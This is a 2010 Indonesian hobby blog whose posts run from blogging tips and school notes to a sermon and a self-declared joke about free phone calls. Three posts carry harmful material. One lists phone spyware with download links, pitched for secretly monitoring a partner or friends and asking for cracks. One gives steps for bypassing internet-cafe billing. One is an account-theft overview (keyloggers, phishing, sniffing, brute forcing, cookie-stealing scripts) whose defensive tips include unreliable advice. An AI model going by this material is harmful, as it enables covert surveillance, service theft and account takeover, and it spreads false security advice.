Latest Entries »

Sabtu, Juli 17, 2010

cara membuat tulisan tercoret di blog

hihihi ngepost.... lagy ...
lama gag ngepost weleh..
pada postingan ini saaya mau memberitahu kawan sekalian cara membuat tulisan tercoret pada blog kita gag perlu banyak kode untuk membuat tulisan coret pada blog
contoh:: iman qidies blog mau???

okeh langsung

<strike> tulisan yang ingin di coret </strike>

hihih udah deh .. gampang kan ^^
keep blogging

»»  READMORE...

Rabu, Juli 14, 2010

cara update status via apa saja . atau telpon umum

cara mengupdate status via apa saja alias terserah kita misalnya melalui telpon umum dll
tertarik ??
pasti seru yah kalo kita update status via apa saja
saya gag mau basa basi deh semua pasti dah tau...

langsung aja

cara mengupdate status via terserah kita.. telpon umum dLL



sebelum temen* membaca lebih lanjut .. bagi yang gag mau repot aku dah siapin link untuk langsung tinggal temen* update lewat link yang saya kasi ini ...
tapi bagi yang mau update status via apa saja nama kamu atau apapun silhkan baca mpe abiss yeah ^^

blueberry : http://apps.facebook.com/blue-berry/index.php
Hp pinjaman : http://apps.facebook.com/hppinjaman/
Kantor pos : http://apps.facebook.com/kantor-pos/
Warnet : http://apps.facebook.com/dariwarnet/
Wartel : http://apps.facebook.com/dariwartel/
aple imac :: http://www.facebook.com/apps/application.php?id=247809162078
hpnya presiden ::http://www.facebook.com/apps/application.php?id=228457546259


yah untuk update status via apa saja silahkan ikuti tutorial ini ~~~

Login dulu ke akun FB anda
Setelah berhasil masuk. berikutnya Silahkan anda masuk lagi ke
http://developers.facebook.com/setup/
Berikutnya silahkan isi data aplikasi via terserah anda pada kolom yg telah di sediakan,.

Nama situs web.. ini silahkan kalian isi dengan nama update anda mislnya telpon umum.. bllog iman . atau terserah anda

url situs web.. ini alamat tujuan aplikasi .. jika diklik oleh orang yang melihat status kita bakal menuju kesini.. harus lengkap dengan httpnya yah ^^
jikka sudah klik buat aplikasi
pada halamn selanjutnya ...


copy app idnya simpan di word atau notepad ..




masi mau lanjut????????????
kalo mau ayokk tarikkk hihihi

Berikutnya silahkan temen* masuk lagi ke
http://developers.facebook.com/docs/reference/plugins/live-stream

Ganti App ID yang ada pada kolom setting Live Stream dengan kode App ID yang anda simpan tadi...
=>>Untuk Width dan Height sebaiknya jangan di rubah atau biarkan saja..
=>> Berikutnya klik Get Code


selanjutnya copy kode diiframe yang muncul.




setelah code tadi kamu copy kamu buka notepad .. paste di notepad .. code tadi
kemudian beri nama pada notepad tersebut dengan nama yang berakhiran .html Contoh: teh qideis.html** dengan cara klik menu File pada notepad, kemudian pilih Save As...




berikutnya pada kolom File Name : isikan dengan nama aplikasi anda yang di akhiri dengan .html => pada Save As type : pilih All Files => Pada kolom ketiga / Encoding **ANSI** biarkan saja / jangan di rubah => Setelah di isi dengan benar, berikutnya klik Save

lalu buka file tadi klik dua kali dan ... ada kolom yang muncul ... tulis stat di situ ........ klik kirim dan lihat hasilnya ...
yang akan muncul ...... inget harus login ke facebokk

ini update lewat rumah gw



ini lewat telpon umum depan spendoe




udah segitu aja goodluck frennd ^^


»»  READMORE...

pengertian negara menurut ahlinya

hihi semoga temen`temen saya pada masuk sini ... ini tugas sekolah yang mumet di kelas IX ini ... hehhee judl yang dikasi guru pengertian negara menurut para ahli
yah yang bakal saya masukin dalam posting ini
pengertian negara menurut aristoteles, Roelof Krannenburg, hans kelsen, jean bodin, hegel, profesor R djokosoetono, profesor Mr. soenarko, roger saltau

langsung pada intinya ^.~
pengertian negara menurut aristoteles
Negara adalah perpaduan beberapa keluarga mencakupi beberapa desa, hingga pada akhirnya dapat berdiri sendiri sepenuhnya, dengan tujuan kesenangan dan kehormatan bersama.
pengertian negara menurut R kranenburg
Negara adalah suatu organisasi yang timbul karena kehendak dari suatu golongan atau bangsanya sendiri.
pengertian negara menurut george jellinek
Negara adalah organisasi kekuasaan dari sekelompok manusia yang telah berkediaman di wilayah tertentu.
pengertian negara menurut hegel
Negara merupakan organisasi kesusilaan yang muncul sebagai sintesis dari kemerdekaan individual dan kemerdekaan universal.
pengertian negara menurut roger F. soltau
Negara adalah alat atau wewenang yang mengatur atau mengendalikan persoalan bersama atas nama masyarakat.
pengertian negara menurut profesor R djokosoetono
Negara adalah suatu organisasi manusia atau kumpulan manusia yang berada di bawah suatu pemerintahan yang sama.
pengertian negara menurut profesor Mr soenarko
Negara adalah suatu organisasi masyarakat yang mempunyai daerah tertentu di mana kekuasaan Negara berlaku sepenuhnya sebagai kedaulatan.


hihi demikian kawan ^^ semoga bermanfaat

dikutip dari berbagai sumber ........

»»  READMORE...

Senin, Juli 12, 2010

award lagi ......



hihii dapet award lagi ini award saya yang kelima hahaha... sebenarnya sih award ini dikasi dah beberapa hari yang lalu tapi baru sempet posting sekarang hehehe sama kawan saya sas thanks yah ^^
langsung aja ke awardnya

award ini saya berikan untuk kawan saya,.. 5 posisi teratas di Cbox waktu saya posting ini hehehe

berikt daftarnya

unos
faril
kang inung
kang astho
syahida computer

Sobat saya tersebut juga memberikan aturan Main:
Bagi siapa saja yang menerima award ini diharuskan untuk membagikan kembali award ini kepada sepuluh orang temannya. Selanjutnya, si penerima award harus meletakkan link-link berikut ini di blog atau artikel masing-masing:

agus' site
elang antar nusa
plus n78
Sasaciq




Sebelum sobat-sobat meletakkan link-link di atas, hapus terlebih dahulu peserta nomor 1 dari daftar. Sehingga semua peserta naik 1 level. Peserta nomor 2 menjadi nomor 1, nomor 3 jadi 2, dst. Kemudian masukkan link shobat sendiri di bagian paling bawah (nomor 5). Tapi ingat...!!!, kalian semua harus adil dalam menjalankannya. Jika tiap penerima award mampu memberikan award ini kepada 5 orang saja, maka anda semua akan mendapatkan Backling yang anda dapatkan adalah :
Posisi 5, jumlah backlink = 5
Posisi 4, jumlah backlink = 25
Posisi 3, jumlah backlink = 125
Posisi 2, jumlah backlink = 625
Posisi 1, jumlah backlink = 3,125

Dan semuanya menggunakan kata kunci yang sobat inginkan. Dari sisi SEO (Search Engine Optimation) sobat sudah mendapatkan 1,953,125 backlink dan keuntungannya, blog sobat akan mendapatkan traffic tambahan, mengerti ya sobat elang cs, apalagi jika ada yang meng-klik link ke blog sobat. Jadi jangan sia-siakan award ini ya sobat !


»»  READMORE...

Sabtu, Juli 10, 2010

koneksi tingkat dewa gan internet di jepang yang bikin pusing

yah saya saya sedih sekali waktu liat berita diforum diskusi FB yang begitu mengherankan .. judul diskusi *internet kita kalah jauh* .......
padahal bisa dibilang menurut saya negara maju
tapi layanan akses internet diINDONESIA masih jauh dibanding negaara-negara maju lainnya seperti singapura, jepang, USA eTc

Di Jepang, kecepatan akses internetnya rata-rata lebih kencang 10 kali lipat dari Amerika dan tidak dibatasin. Kita lihat saja contoh layanan terbaru dari cable provider terbesar dari Jepang, J:Com, memiliki layanan 160Mbps kerumah.

Bukan saja kencang, tetapi harganya bikin error. Hanya perlu tambahan untuk upgrade kurang dari $10 ke layanan lebih cepat. J:Com ISP Jepang memberikan layanan 160Mbps cuma $60 perbulan atau 30Mbps dengan $54 perbulan.

Jadi dengan membayar kurang lebih Rp. 670.000,- perbulan, Anda bisa mendownload sebuah film DVD ukuran 700MB hanya dalam 5 detik, dan download sebuah lagu MP3 cuma sekitar 0.03 detik. Menakjubkan bukan?

Bagaimana dengan negara adidaya Amerika? Amerika memiliki ISP Time Warner cable dengan kecepatan 16Mbps, tapi dibatasi untuk mendownload. Untuk layanan Verizon dengan Fiber Optic FiOS. Dengan akses internet kecepatan 160Mbps, pemakai harus membayar $817 perbulan, belum lagi ada tambahan biaya pemasangan $716. Jadi harganya kurang lebih 12x lebih mahal dibandingkan Jepang.

Wah jauh enakan hidup di Jepang, bagi yang membutuhkan akses internet kencang, apalagi bagi yang hobi download. :-) Indonesia dapat akses 1Mbps (1:1) sudah syukur, itu juga belum lagi di quota ama ISPnya...buntutnya ampe dirumah 128kbp...itu pun masih share.....hahahahahaha

sumber forum diskusi hacked

»»  READMORE...

Rabu, Juli 07, 2010

komentar dan blog di anggap spam oleh akismet alias gag bisa muncul

begitu sedihnya kita jika blog yang lama kita urus harus dianggap spam (komentar) yah seperti yang saya alami beberapa waktu lalu dan sukur alhamdulillah sudah terbebas ^^ ... mungkin..
dampak dari blog yang dianggap spam oleh akismet ialah...
1. komentar pada blog kita tidak bisa muncul...

2. komentar kita diblog lain juga tidak bisa muncul !!!

nyakitkan kalo gitu..

kalo mau tahu mengatasinya,, cara ini yang saya lakukan ketika blog saya dianggap nyepam(spammer)
oleh akismet
pertama yang harus kita lakukan masuk ke url ini http://akismet.com/contact/

1. jika sudah
2. Isi form yang tersedia. Pada bagian suppose, pilih I have a support or feature request.
3. Pada bagian Message, saya menulis begini:

My comments that I post on other blogs seem to go straight to the spam folder and thus never get published. Please don’t treat this as spam due to I didn’t do spam activities.

4. Klik Submit.

yah begitulah yang saya lakukan ketika komentar saya diblogkir oleh akismet
mohon komentar kawn ^^
»»  READMORE...

Selasa, Juli 06, 2010

nikmat, rahmat dan ibadah

Nikmat Allah SWT tidak ada bandingnya di dunia ini yah begitulah isi ceramah saya hari ini yang bisa saya dapat hari ini …… saya akan sedikit menjelasakan kenapa kok bias ada ceramah yah di sekolah padahal ini hari selasa .. karena hari ini hari mos siswa baru .. … jadi kita di suruh ke masjid raya ^^
Semoga ulasan di bawah ini bias menyadarkan kita semua begitu baiknya ALLAH kepada kita semua ^^

Saya awalnya sangat malas mendengarkannya xixixiixi
tapi untung saya mau hehehe
to the point aja deh
isi dari ceramah itu ^^

suatu saat ada seorang hamba yang sudah beribadah sekitar 500 tahun lebih di datangi oleh malaikat jibril.. malaikat jibril mengatakan kepada sang hamba ini bahwa Allah telah memutuskan bahwa dia akan masuk surga dengan rahmat Allah… tetapi dengan tegas ia menolak dan mengatakan ya Allah aku tidak ingin masuk karena rahmatmu tapi aku ingin masuk surga karena ibadahku selama 500 tahun…
Lalu Allah berkata jibril timbang amal ibadahnya dengan sebiji bola mata hambanya itu..
Setelah ditimbang betapa kagetnya dia ketika bola mata itu jauh seratus kali lipat lebih berat dari ibadah selama 500 tahun … lalu orang itu di masukkan kedalam neraka jahannam

Dari sepenggal ceramah diatas kita bisa tau betapa besar nikmat Allah .. sampai-sampai ibadah 500 tahun tidak akan cukup membalas itu semua …
Semoga dengan cerita di atas kita bias sadar dan mau lebih giat lagi beribadah kepada sang khalik ^^
»»  READMORE...

Senin, Juli 05, 2010

cara membuat pulsa kita tidak habis walau di pakai

malam ne saya mau posting cara membuat semua kartu GSm gratis -- tis dan tiss hehehe bingunng mau kasi judul apa
Sorry buat2yang berkunjung di blog saya kalo mearasa ini udah basi... ^_^

Satelit dari NASA yang diluncurkan tahun 1985 ini ternyata memberikan pelayanan yang tidak diketahui sebelumnya oleh umat manusia berikut rahasia terbesarnya :

Pulsa gratis. Temen-2 ini agak rahasia tolong jangan disebarluaskan. Saya sudah mencobanya, dan terbukti membuat kantong tidak terganggu dan tetap tebal...


Trik menggunakan HP tanpa pulsa. Ini adalah trik yang bisa dicoba, disadap dari sumber yang tidak mau disebutkan namanya karena tidak mau ketahuan. Baca lebih lanjut ..

PULSA HANDPHONE MAHAL???

Manfaatkan kelemahan sistem ponsel Anda sehingga Anda bisa main telepon dengan GRATIS, kemana saja, berapapun lamanya!!!Yang dibutuhkan adalah cuma beberapa menit untuk mempelajari tulisan ini dengan teliti sekaligus langsung mempraktekkannya ke ponsel Anda. Inilah yang akan saya share ke teman-teman sekalian.
Langkah Pertama :

Catat spesifikasi ponsel Anda meliputi :

1. Merk (misal Nokia, Siemens, Motorola, dll)

2. Jenis (misal 6120c, M35, 3310, T18S)

3. No IMEI (optional, tapi sebaiknya dicatat, kalau ada masalah)

Langkah Kedua :

Siapkan segera no telpon yang akan dituju, serta amati kuat sinyal pada indikator. Sebaiknya sinyal pada posisi maksimum,artinya Anda tidak boleh terlalu jauh dari base station, atau bila Anda berada dalam ruangan tertutup, sebaiknya Anda keluar atau mencari tempat dimana kuat sinyal diterima maksimal.

Pastikan no telepon yang Anda tuju siap untuk menerima telepon, ini bisa Anda lakukan dengan menelepon, kemudian tutup (missed call). Bila sedang sibuk, tunggu sampai idle.

Langkah Ketiga :

Lakukan prosedur eksekusi berikut :

1. Tekan tombol bintang (*)

2. Tekan tombol angka konversi untuk merk Anda :

Nokia : 29

Motorola : 15

Ericsson : 74

Samsung : 12

Siemens : 98

Untuk merk lain sedang dalam proses pencarian.

3. Tekan tombol seri ponsel Anda :

Misal :

Nokia 6120c = 6120

Ericsson T10S = 10

Ericsson A6188 = 6188

Jadi ambil angkanya saja.

4. Tekan tombol pagar (#)

5. ikuti dengan nomor telepon yang akan dituju :

Format : kode negara + kode wilayah + no telepon

Kalau yang ditelepon di Solo, nomernya 611748, maka harus ditekan: 62271611748

Keterangan

Kode negara : 62 dan Kode wilayah : 0271

6. Tekan tombol pagar (#)

Jadi sebagai contoh kalau saya punya ponsel Nokia 6120c, dan ingin menelpon ke Palembang dengan no telepon 321654(kode kota 0711), maka saya harus menekan : *296120#62711321654#

Silahkan periksa sekali lagi sebelum kita melakukan eksekusi terakhir!!!

LANGKAH TERAKHIR : VERY IMPORTANT THING

Pastikan pada layar ponsel Anda tertera karakter dengan urutan yang benar! Kesalahan penggunaan bisa menyebabkan kartu Anda tidak berlaku lagi, dan saya tidak bertanggungjawab untuk hal tersebut. Jadi silakan periksa sekali lagi.

Sebelum Anda tekan Enter atau Call, yang harus Anda perhatikan bahwa anda HARUS segera mematikan ponsel pada hitungan antara detik ke-2 dan ke-3!!! Tidak boleh LEBIH dan tidak boleh KURANG!!! Anda bisa melakukannya pada detik ke 2.1 atau 2.4 atau 2.7 setelah penekanan tombol Call.

Sebaiknya Anda mempersiapkan jam tangan, lebih baik bila ada stopwatch-nya. Setelah itu Anda bisa bicara sepuasnya, mau beberapa jam, mau beberapa hari atau bahkan berbulan-bulan, mau berteriak sekerasnya, dijamin Anda tidak akan mengeluarkan biaya kecuali yang telah dijelaskan di atas. Sebaiknya Anda berbicara jangan di depan muka umum, karena akan memalukan Anda sendiri. dah puas?

Kalau sudah puas atau sudah lelah berbicara, silakan nyalakan kembali ponsel Anda, siapa tahu ada orang yang serius mau menghubungi Anda. Kasihan dia, mau menelepon Anda tapi masuk ke mailbox terus.

Hahahahaha,…… Sante Aja mas mbacanya gak usah serius banget Sampo melotot kayak gicyu…………..Ye…..Mana ada Mas TRLPON GRATIS, Sekarang tu apa apa Dah Harus Bayar, Sampai masalah kencing.

thx semua hehehe maaphh becandaa salam QiddDDieeSS

»»  READMORE...

aplikasi penyadap

saia dpet ni posting di forum diskusi the hackingg 10 software penyadap ^^
1) Mobile Secuware
Fitur penyadap Mobile Secuware bisa digunain utk memantau pacar aato tmen kita lewat fitur Remote Monitoringvnya. Selaen ntu Aplikasi ini dibekali kemampuan anti maling, jd klo hp ncang2 pd ilang ato di curi, kita bisa tau lewat fasilitas M-Trax (data2 nya pun bisa di selamatin)
aplikasi nya bisa di donlot di http://www.mobile-secuware.com

2) Xelnex Lite
Xelnex Lite bisa digunain utk ngerekam pembicaraan ditelpon tanpa didahului bunyi 'beep'. jd terjaga kerahasiaaan nya,,
sayang nya aplikasi niy masih shareware alias bayar, tp kita bisa nyoba versi trial nya selama 10 hari n' aplikasi niy kompatibel utk Symbian S60 3rd edition.
klo ada yg mo nyoba donlot aja di http://shop.psiloc.com/d/s60/XelnexLite_s603rd.sisx
NB : klo udah ada yg bisa nge crack nya, tolong di share yaa..

3) Mobile-Spy
Pengguna hp Symbian S60 udh bisa make layanan pengintip isi hp dr jarak jauh. Dgn layanan ini mereka bisa mengetahui informasi lalu lintas sms dan telpon, yg bisa diakses dr pc ato hp laen lewwat server yg disediain.
selaen Symbian, hp yg berbasis windows Smartphone jg bisa make aplikasi niy...
sayang nya aplikasi niy juga msh trial, klo ada yg mo nyoba donlot di http://www.mobile-spy.com/MobileSpy.CAB versi trial nya cuman 7 hari
NB : klo udah ada yg bisa nge crack nya, tolong di share yaa..

4) BT Info
aplikasi yg niy cuman memanfaatkan bluetooth doank, ya jd sama lah kya aplikasi2 laen...
klo ada yg mo nyoba, donlot di http://en.k508i.wz.cz/jar/ftp_bt_105.jar
BT Info jg bisa digunain utk ngendaliin semua fungsi hp, kaya nelpon, kamera, alarm, master reset, ampe matiin hp juga bisa.

5) Call Rrecorder dan AGLAYA Call Magic
fungsi nya cuman utk ngerekam pembicaraan telpon doank,,
klo ada yg mo nyoba, donlot disini aja http://symbianware.com <== utk Call Recorder nya
http://www.aglaya.com/symbian/symbian_software/symbian_software_download_call_magic.asp <== utk AGLAYA Call Magic nya

6) TimedSpy
klo pnya hp Symbian S60 v.2 bisa langsung make tnpa alat tambahan,,
fungsi nya utk mengintai orang, jd aplikasi nya melakukan pemotretan trus hasil nya lngsung dikirm gituu...
klo ada yg mo nyoba, donlot di http://www.diginaut.com/mobile/archive/TimedSpyTrial.sis

7) Magic Blue Hack
Aplikasi garapan Humayan Kabir Pavel dan Avishek Ahmed ini, kompatibel utk ponsel Java MIDP 2.0 berBluetooth, Symbian s60, dan PDA.
Fitur yg tersedia yaitu Make Call, Send SMS, Phonebook, Write Ph Book, Answer Call, dan Hang Call.
klo ada yg mo nyoba, donlot di http://www.getjar.com/products/175782/MagicBlueHack

8) BT Teror
Untuk usil2an, bisa di donlot di http://www.symbian-freak.com/downloads/app/3rd_ed/BT_Teror_S60v3.zip.
Fungsi nya untuk memanipulasi bluetooth, jd aplikasi nya utk ngirim file2 ke hp target terus2an,, jd kaya flooding gitu deh...
Aplikasi niy harus terintregrasi pula dengan program Python S60 dan Python Script Shell. Utk nge donlot Python nya bisa donlot di http://sourceforge.net/project/showfiles.php?group_id=154155

9) Mobiscope beta
Seiring kemajuan teknologi, dengan memanfaatkan jaringan internet kita bisa menikmati layanan video streaming. Jd, nnti nya kita bisa membroadcast pantauan webcam melalui server dari suatu penyedia layanan. Hingga kita bisa dengan mudah mengaksesnya lewat hp, sekalipun jarak kita jauh. Mayoritas ponsel yg beredar di pasaran bisa melakukannya, mengingat sudah dijejali teknologi bearer data (GPRS/3G).
klo ada yg mo nyoba, donlot di http://www.mobiscope.com/.
dengan aplikasi ini, kita bisa mengakses webcam lewat hp dengan aman dan nyaman. Menarik nya lg, aplikasi niy dilengkapin fitur sensor gerak dan scheduler, utk merekam situasi pada waktu tertentu.

10) SMS Anywhere
SMS Anywhere fungsi nya nge forward semua sms yg dikirim n' diterima ponsel target ke ponsel kita.
klo ada yg mo nyoba, donlot di http://www.wireless-labs.com/smsanywhere/

»»  READMORE...

Minggu, Juli 04, 2010

cara bermain internet secara gratis

yah hari ni saya mau ngajarin maen warnet gratis tanpa bayar
tapi jangan terlalu sering di pake ntar rugi pemilik warnet
atau operatornya
hehehhehe
kamu gak perlu software apaapa di sini cukup ketepatan okeehhh

langkah langkahnya mari kita mulai hahahaha :::::
1. Kalo komputer nya masih masih mati, nyalain ! Tapi kalo udah nyala, Restart komputer nya…
2. Waktu komputer mulai nyala…siap-siap…
3. Pas udah masuk desktop windows, ada jeda sekitar 2-3 detik sebelum tampilan billing muncul, nah cepet2 kita pencet icon browser (Internet explorer/Mozilla Firefox dll…). Atau kalo ga ada, pencet icon Windows Explorer aja.
4. Nah, pas billing udah muncul, pasti desktop ketutup ama billing jadi ga keliatan, tapi kalo browser udah kebuka pasti browsernya langsung muncul, trus tinggal di Alt+Tab aja. Nah… udah bisa browsing khan… tapi ga bebas, soalnya taskbar nya ga ada, jadi kalo mau pindah aplikasi harus pake Alt+Tab. Atau kalo mencetnya icon Windows Explorer, pas Windows Explorer nya kebuka, cari aja icon Internet Explorer (biasanya ada di folder desktop).

»»  READMORE...

cara seorang hacker mengambil akun facebook kita

Pencurian password, pengambilalihan account, merupakan hal yang sering terjadi di dunia cyber. Bukan hal yang sulit untuk melakukannya, namun banyak para newbie yang terus saja bertanya-tanya.. “Bagaimana cara mendapatkan password email orang lain?

” atau pertanyaan yang paling sering saya terima ialah.. “Bagaimana cara anda mendapatkan password saya?”

Untuk pertanyaan-pertanyaan itulah artikel ini ditulis, semoga bisa menambah wawasan anda dan membuka pikiran anda tentang betapa pentingnya menjaga account saat berada di tempat-tempat rawan.

Bagaimana Mendapatkannya?

Ada banyak cara untuk mendapatkan suatu password. Beberapa diantaranya tidak membutuhkan keahlian khusus. Berikut adalah cara-cara yang paling umum dan paling sering digunakan:
[1]. Social Engineering
[2]. KeyLogger
[3]. Web Spoofing
[4]. Menghadang Email
[5]. Password Cracking
[6]. Session Hijacking
[7]. Menjadi Proxy Server
[8]. Memanfaatkan Kelalaian User Dalam Penggunaan Fitur
Browser
[9]. Googling

[1]. Social Engineering

Social Engineering adalah nama suatu tehnik pengumpulan informasi dengan memanfaatkan celah psikologi korban. Atau mungkin boleh juga dikatakan sebagai “penipuan” :P Sosial Engineering membutuhkan kesabaran dan kehati-hatian agar sang korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikiran seperti sang korban.

Social Engineering merupakan seni “memaksa” orang lain untuk melakukan sesuatu sesuai dengan harapan atau keinginan anda. Tentu saja “pemaksaan” yang dilakukan tidak secara terang-terangan atau diluar tingkah laku normal yang biasa dilakukan sang korban.

Manusia cenderung untuk percaya atau mudah terpengaruh terhadap orang yang memiliki nama besar, pernah (atau sedang berusaha) memberikan pertolongan, dan memiliki kata-kata atau penampilan yang meyakinkan. Hal ini sering dimanfaatkan pelaku social engineering untuk menjerat korbannya. Seringkali sang pelaku membuat suatu kondisi agar kita memiliki semacam ketergantungan kepadanya.Ya,tanpa kita sadari dia mengkondisikan kita dalam suatu masalah dan membuat ( seolah – olah hanya ) dialah yang bisa mengatasi masalah itu. Dengan demikian,tentu kita akan cenderung untuk menuruti apa yang dia instruksikan tanpa merasa curiga.

Sosial Engineering adakalanya menjadi ancaman serius. Memang sepertinya tidak ada kaitan dengan teknologi, namun sosial engineering tetap layak diwaspadai karena bisa berakibat fatal bagi sistem anda. Why?? Karena bagaimanapun juga suatu komputer tetap saja tidak bisa lepas dari manusia. Ya, tidak ada satu sistem komputerpun di muka bumi ini yang bisa lepas dari campur tangan manusia. sehebat apapun pertahanan anda, jika anda sudah dikuasai oleh attacker melalui social engineering, maka bisa jadi anda sendirilah yang membukakan jalan masuk bagi sang attacker.

[2]. KeyLogger

KeyLogger adalah software yang dapat merekam aktivitas user. Hasil rekaman itu biasa disimpan berupa teks atau gambar. KeyLogger bekerja berdasarkan ketukan keyboard user. Aplikasi ini mampu mengenali form-form sensitif seperti form password misalnya.

Ada cara aman untuk menghindari keyloger:

1. Gunakan password dengan karakter special seperti !@#$%^&*(){}[]. Kebanyakan keyloger akan mengabaikan karakter ini sehingga sang pelaku (pemasang keyloger) tidak akan mendapatkan password anda yang sebenarnya.

2. Persiapkan password dari rumah, simpan dalam bentuk teks. Saat ingin memasukkan password, tingal copy-paste ajah. Keyloger akan membaca password anda berdasarkan ketukan keyboard. Namun cara ini agak beresiko. Mengapa? karena saat anda melakukan copy, data anda akan tersimpan di clipboard. Saat ini banyak dijumpai software-software gratis yang bisa menampilkan data dalam clipboard.

[3]. Web Spoofing

Masih ingat kasus pecurian Account sejumlah nasabah Bank BCA? Ya, itulah salah satu contoh nyata dari Web spoofing. Inti dari tehnik ini ialah dengan memanfaatkan kesalahan user saat mengetikkan alamat situs pada address bar. Pada dasarnya, Web Spoofing adalah usaha untuk menipu korban agar mengira dia sedang mengakses suatu situs tertentu, padahal bukan.

Pada kasus bank BCA, pelaku membuat situs yang sangat mirip dan identik dengan situs aslinya sehingga sang korban yang terkecoh tidak akan merasa ragu mengisikan informasi sensitif seperti user name dan Passwordnya. Padahal, karena situs tersebut adalah situs tipuan, maka semua informasi berharga tadi terekam oleh webserver palsu, yaitu milik sang pelaku.

[4]. Menghadang Email

Menghadang email? Ya, dan sangat mudah untuk melakukan hal ini. Salah satu cara adalah dengan menggunakan mailsnarf yang terdapat pada utility dsniff. Cara kerja Mailsnarf adalah dengan menghadang paket data yang lewat di Internet dan menyusunnya menjadi suatu email utuh.

Dsniff dan mailsnift merupakan software bekerja atas dasar WinPcap (setara dengan libcap pada Linux) yaitu suatu library yang menangkap paket-paket data. Paket-paket yang ditangkap ini akan disimpan dalam bentuk file oleh Windump, sedangkan Dsniff dan MailSnarf bertindak lebih jauh lagi yaitu menganalisa paket-paket data ini dan menampilkan password (dsniff) atau isi email (mailsnarf).

[5]. Password Cracking

“Hacking while sleeping.” itulah ungkapan yang biasa dipakai oleh orang-orang yang melakukan password cracking. Mengapa? Karena pada umumnya dibuthkan waktu yang lama untuk melakukan pasword cracking. Bisa berjam-jam, bahkan berhari – hari! Semua itu tergantung dari target, apakah sang target menggunakan password yang umum, password memiliki panjang karakter yang tidak biasa, atau password memiliki kombinasi dengan karakter-karakter special.

Salah satu software yang biasa digunakan untuk melakukan hal ini ialah dengan mengunakan Brutus, salah satu jenis software remote password cracker yang cukup terkenal. Brutus bekerja dengan teknik dictionary attack atau bruce-force attack terhadap port-port http, POP3,ftp, telnet, dan NetBIOS.

Dictionary Attack bekerja dengan mencobakan kata-kata yang ada dalam kamus password. Sedangkan brute – force attack bekerja dengan mencobakan semua kombinasi huruf, angka, atau karakter.

Brute Force Atack bekerja sangat lambat dan membutuhkan waktu yang lama tergantung dari jenis spesifikasi komputernya dan panjang karakter passwordnya. Saat ini telah banyak situs yang menutup akses terhadap akses terhadap usaha login yang secara terus-menerus tidak berhasil.

Jika anda ingin melakukan password Cracking, silahkan pilih – pilih sendiri aplikasinya di halaman Member – spyrozone.tk.

[6]. Session Hjacking

Session hijacking dewasa ini semakin marak dikalangan para attacker. Session Hijacking biasa dilakukan dengan melakukan peniruan cookies. Jadi pada intinya, kita harus bisa meniru cookies sang korban untuk mendapatkan sesi loginnya.

Lalu bagaimana cara mendapatkan cookies sang korban?

1. Dengan analisa Cookies.
Cara ini relatif sulit dilakukan.

2. Mencuri Cokies.
Misalnya Sang Attacker ingin mendapatkan account si A. Sang Attacker bisa dengan mudah membuat semacam script Java Script yang disisipkan dalam email untuk dikirim ke korban.Saat korban membuka email itu, tanpa sadar cookiesnya akan dicuri dan direkam ke suatu webserver dengan memanfaatkan suatu script PHP.

Belakangan ini yang paling sering menjadi incaran adalah account Friendster. Ada yang menyisipkan suatu scipt lewat testimonial, ada yang menyisipkannya di profilnya sendiri untuk mencuri cookies sang korban dan lain sebagainya. Saya memiliki tips untuk ini:

1. Jangan menggunakan browser Internet Explorer
Saat ingin membuka profil orang lain, jangan menggunakan Internet Explorer. Catat alamat profil yang ingi anda lihat,logout terlebih dahulu dari account anda dan bersihkan semua cookies, baru kemudian bukalah profil Friendster tujuan.

2. Periksa Source CODEnya
Ketika menerima testimonial, periksa terlebih dahulu source codenya. Apakah disana terdapat script asing atau kata-kata yang identik dengan pembajakan seperti :
“HACKED”, “DEFACED”, “OWNED”.. dll..
Jika ragu-ragu……. reject ajah..

3. LogOUT tiba-tiba.
Waspada ketika tanpa suatu alasan yang jelas tiba-tiba anda logout dengan sendirinya dari account anda. Saat anda diminta memasukkan username dan password, lihat dulu addressbar anda! apakan anda sedang berada di situs yang semestinya atau tidak. Periksa source code halaman tersebut.Lihat pada form action, kemana informasi anda nantinya akan dikirim.

Sebenarnya session hijacking bisa dicegah jika saja sang penyedia layanan memperhatikan hal-hal berikut:

1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi
client side.

Fenomena lain adalah, hingga saat artikel ini diterbitkan, ternyata masih banyak dijumpai para user yang tidak melakukan sign out setelah membuka accountnya. Dengan demikian, orang lain yang mengunakan komputer itu dan membuka website yang sama dengan yang telah dibuka oleh orang pertama akan otomatis login ke account sang korban.

[7]. Menjadi Proxy Server
Kita bisa mengumpulkan informasi dengan menjadi proxy server bagi korban untuk dapat berselancar. Dengan menjadi proxy server, seluruh identitas sang peselancar bisa menjadi milik kita.

[8]. Memanfaatkan Kelalaian user dalam penggunaan fitur
browser

Setiap browser tentunya memiliki fitur yang ditujukan untuk kemudahan dan kenyamanan penggunanya dalam berselancar. Diantaranya ialah dengan adanya cache dan Password Manager.

Di Internet tentunya banyak suatu website yang isinya tidak berubah dalam beberapa hari (Contohnya spyrozone.tk ;) Nah, untuk situs yang seperti ini cache menjadi hal yang sangat berguna. Cache akan menyimpan file-file hasil browsing sehinga nantinya jika anda berkunjung lagi ke situs tersebut browser tidak perlu lagi melakukan download untuk kedua kalinya dari server sehingga setiap halaman situs yang telah anda buka sebelumnya akan terbuka dengan lebih cepat. Semua itu biasanya diatur oleh header time to live.

Lho, bagaimana dengan situs-situs penyedia berita yang selalu up to date? Untuk site yang seperti itu, time to live-nya akan di set=0 sehinga nantinya anda akan terus melakukan download setiap kali berkunjung.

Cukup nyaman bukan? Ya, tapi ancaman mulai timbul. Cobalah kini anda jelajahi opsi-opsi yang berkaitan dengan cache pada browser anda. Tentu anda bisa menemui bahwa ada fasilitas untuk menentukan berapa besarnya file temporary yang bisa disimpan di harddisk. Cari juga lokasi dimana file-file tersebut akan disimpan.

Coba anda buka folder tersebut, anda akan menemui file-file html & file-file gambar dari site-site yang sudah anda kunjungi. Pada Browser IE, anda bisa melihat lokasi file cache dengan menjelajahi menu Tools —> Internet options —> Settings

Lalu apa yang bisa didapatkan?? toh cuma file-file “sampah”?? Hmm… sekarang coba anda copy semua file yang ada di sana ke suatu folder. Lalu bukalah salah-satu file htmlnya. Jika itu komputer publik,anda bisa mengetahui situs apa saja yang telah diakses oleh oleh orang sebelum anda.

Hmm.. hanya dengan melihat file temporary anda bahkan bisa melihat password dan dll. Banyak saya temui situs yang menyimpan password dan menampilkannya pada url. Tentunya anda juga pasti sering membacanya di berbagai tutorial.

